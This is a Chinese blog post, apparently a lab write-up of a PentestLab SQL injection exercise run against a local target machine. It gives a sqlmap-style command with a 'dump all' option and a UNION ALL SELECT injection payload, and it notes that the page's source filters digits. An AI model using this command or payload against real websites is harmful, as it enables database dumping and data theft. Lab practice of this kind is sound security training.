PentestLab-web安全SQL注入-EXP5

原创

最爱大苹果 2023-03-17 09:25:05 博主文章分类：WEB信息安全技术 ©著作权

文章标签 sql sql注入 php 文章分类 网络安全 yyds干货盘点

©著作权归作者所有：来自51CTO博客作者最爱大苹果的原创作品，请联系作者获取转载授权，否则将追究法律责任

我们打开靶机，选择“sql injections”

选择“Example5”

PentestLab-web安全SQL注入-EXP5_sql

观察页面

PentestLab-web安全SQL注入-EXP5_sql_02

使用工具测试

参数为

-u "http://192.168.29.148/sqli/example5.php?id=2" --dump all

payload为

id=2 UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a6a71,0x4a4859624e4166537a476246556b4757574375516e647a584a4341486b5a5562614c4d506f4a6e54,0x7162787671),NULL,NULL-- -

明显是经过编码之后的注入

结果

PentestLab-web安全SQL注入-EXP5_sql注入_03

存在sql注入漏洞

我们打开靶机，

分析源代码

PentestLab-web安全SQL注入-EXP5_sql注入_04

过滤了0-9的数字，但是有些编码并没有过滤掉。

上一篇：PentestLab-web安全SQL注入-EXP4

下一篇：PentestLab-web安全SQL注入-EXP6

提问和评论都可以，用心的回复会被更多人看到评论

发布评论

相关文章

官方博客	全部文章	热门标签	班级博客
了解我们	网站地图	意见反馈

鸿蒙开发者社区	51CTO学堂
51CTO	软考资讯